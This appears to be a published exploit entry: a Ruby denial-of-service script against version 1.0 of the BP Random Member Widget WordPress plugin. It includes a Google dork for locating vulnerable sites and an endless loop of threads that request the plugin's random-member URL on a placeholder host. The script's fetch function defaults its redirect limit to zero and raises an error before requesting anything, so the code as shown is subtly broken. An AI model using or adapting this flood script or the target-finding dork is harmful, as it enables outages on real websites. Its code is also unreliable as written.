# Exploit Title: Dos BP Random Member Widget Plugin WordPress
# Google Dork: allinurl: ?random-member
# Author: a01001100e@gmail.com
# Software Link: http://wordpress.org/extend/plugins/bp-random-member-widget/
# Version: BP Random Member Widget Version: 1.0
# Tested on: debian 2.6.32-5-686
require 'net/http'
require 'uri'
def fetch(uri_str, limit=0)
raise ArgumentError, 'HTTP redirect too deep' if limit == 0
response = Net::HTTP.get_response(URI.parse(uri_str))
case response
when Net::HTTPSuccess then
print response.code
when Net::HTTPRedirection then
a = response.body
else
response.error!
end
end
print "############################\n"
print "## DOS random-member ##\n"
print "## @author: a01001100e ##\n"
print "############################\n\n\n\n"
while 1 do
begin
t = Thread.new{fetch('http://www.sitio.com/members/?random-member')}
print "."
rescue Exception => msg
print "Error: "
puts msg
end
end
